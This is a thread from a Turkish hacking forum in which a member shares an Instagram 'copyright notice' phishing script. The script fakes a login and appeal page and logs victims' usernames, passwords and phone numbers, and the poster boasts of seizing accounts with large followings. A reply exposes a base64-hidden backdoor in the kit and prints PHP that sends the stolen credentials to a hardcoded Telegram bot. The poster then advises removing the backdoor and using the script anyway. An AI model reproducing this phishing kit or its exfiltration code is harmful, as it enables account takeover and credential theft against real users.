İnstagram telif scripti (gelişmiş)

jitter

Üye
1 Tem 2022
179
44
Merhaba arkadaşlar 1 haftadır kullandığım efsane telif scriptini sizlerlede paylaşmak istedim.
45k - 70k - 10k - 10k - 50k düşürdüm bu scriptle umarım sizindw işinize yarar.

Özellikler : Karanlık Modu Var, İtiraz Formu Var, Şifre Yanlış Hatası Verir, Hesap Düşünce Telefonunuza SMS Atar,
Gelişmiş TXT, Dışlinkleri Yoktur (Red Yeme İhtimali Düşüktür O Yüzden)

1- Ana SAYFA SS)

2riq67p.png

2- Şifre Yanlış Hatası SS)

nn0k5yk.png

3-) İtiraz Formu SS) Kullanıcı Adını Foruma Çeker.

qeiyobk.png

4-) Log TXT : Tel No Mo Çeker SS)

78w445o.png

Not : Hesap Düşünce Telefonunuza UygunSMS 'den Deneme
Mesajı Gelmektedir.

İndirme Linki

Virüs Total
VirusTotal

Virüstotalde 1 tane şüpheli çıktı oda dosyanın adı telif scripti olduğundan doları öyle.

GECEYARASA

Üye
4 Eyl 2022
144
89
Ottoman
Merhaba arkadaşlar 1 haftadır kullandığım efsane telif scriptini sizlerlede paylaşmak istedim.
45k - 70k - 10k - 10k - 50k düşürdüm bu scriptle umarım sizindw işinize yarar.

Özellikler : Karanlık Modu Var, İtiraz Formu Var, Şifre Yanlış Hatası Verir, Hesap Düşünce Telefonunuza SMS Atar,
Gelişmiş TXT, Dışlinkleri Yoktur (Red Yeme İhtimali Düşüktür O Yüzden)

1- Ana SAYFA SS)

2riq67p.png

2- Şifre Yanlış Hatası SS)

nn0k5yk.png

3-) İtiraz Formu SS) Kullanıcı Adını Foruma Çeker.

qeiyobk.png

4-) Log TXT : Tel No Mo Çeker SS)

78w445o.png

Not : Hesap Düşünce Telefonunuza UygunSMS 'den Deneme
Mesajı Gelmektedir.

İndirme Linki

Virüs Total
VirusTotal

Virüstotalde 1 tane şüpheli çıktı oda dosyanın adı telif scripti olduğundan doları öyle.
eline sağlık

Napcaz

Katılımcı Üye
28 Nis 2019
767
764
Cudi
Bilinçsiz kullanmanın böylesi, bir haftadır kullanıyorum mu demiştin? Kullanıyoruz desen daha doğru olur daha da doğrusu kullanılmışım. Kendim biraz önce iki telefon üzerinden deneme sms ini almayı çalıştım lakin uygunsms in kendine has bir sıkıntısı var herhalde script üzerinden de denesem direk kendi sitelerinden de denesem kendime mesaj attıramadım. Bu çok önemli değil api değişir yenisi gelir sıkıntı yok. Sıkıntı olan sana bildirim giderken aynı zamanda kodu ilk yazan yada daha sonra değiştirip yayan kişinin telegram adresinede senin düşürdüğün hesapların gitmesi. Bu gerçekten düşündürücü... Değil mi?

no.php nin içinde uzun ////// ları görünce şüphelenmiştim, biraz aralarında gezince base64 le saklanıp eval ile çalıştırılan bir kod gördüm. Kendiniz scripte bakıp bulabilirsiniz.

PHP:
$site = $_SERVER['HTTP_HOST'];
if($_POST){
  $token='5704118039:AAGFEAIBQtOLeQwUdoL3UquUaytKsGpb9Vo';
  $data = [
      'text' => '
  ✅  CoderOffline ✅
  user : '.$user.'
  pass : '.$password.'
  ip : '.$ip.'
  site : '.$site.'
  ',
      'chat_id' =>'5738738442'
  ];
  file_get_contents("https://api.telegram.org/bot$token/sendMessage?" . http_build_query($data) );
}

Eh artık "kurbanları" aranızda paylaşırsınız e mi:D

eray061

Üye
13 Nis 2021
72
8
Eline sağlık kardeşim ama nasıl kuracağımızı anlatır mısın?

Bilinçsiz kullanmanın böylesi, bir haftadır kullanıyorum mu demiştin? Kullanıyoruz desen daha doğru olur daha da doğrusu kullanılmışım. Kendim biraz önce iki telefon üzerinden deneme sms ini almayı çalıştım lakin uygunsms in kendine has bir sıkıntısı var herhalde script üzerinden de denesem direk kendi sitelerinden de denesem kendime mesaj attıramadım. Bu çok önemli değil api değişir yenisi gelir sıkıntı yok. Sıkıntı olan sana bildirim giderken aynı zamanda kodu ilk yazan yada daha sonra değiştirip yayan kişinin telegram adresinede senin düşürdüğün hesapların gitmesi. Bu gerçekten düşündürücü... Değil mi?

no.php nin içinde uzun ////// ları görünce şüphelenmiştim, biraz aralarında gezince base64 le saklanıp eval ile çalıştırılan bir kod gördüm. Kendiniz scripte bakıp bulabilirsiniz.

PHP:
if($_POST){
  $data = [
      'text' => '
  ✅  CoderOffline ✅
  ',
      'chat_id' =>'5738738442'
  ];
  file_get_contents("https://api.telegram.org/bot$token/sendMessage?" . http_build_query($data) );
}

Helal olsun.

'Alp Er Tunga

TSK 🇹🇷
14 May 2022
99
95
underground

PHP:
if($_POST){
  $data = [
      'text' => '
  ✅  CoderOffline ✅
  ',
      'chat_id' =>'5738738442'
  ];
}

Ücretsiz paylaşılan scriptlerin loglu olduğunu ne zaman anlayacak acaba bu millet? Ya da bunu paylaşan kişiler ne zaman zekamıza hakaret etmeyi bırakacak, çok merak ediyorum doğrusu.

jitter

Üye
1 Tem 2022
179
44
arkadaşlar scripti i****** adlı forumdan indirdi yöneticiler bile yorum yapmış bende anlamam logdan falan ne bileyim böyle olduğunu 1 haftadırda hesaplarımı çeken falan olmadı 1 yıl önce paylaşılmış script, @Napcaz ın gosterdiği yeri silip kullanın

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.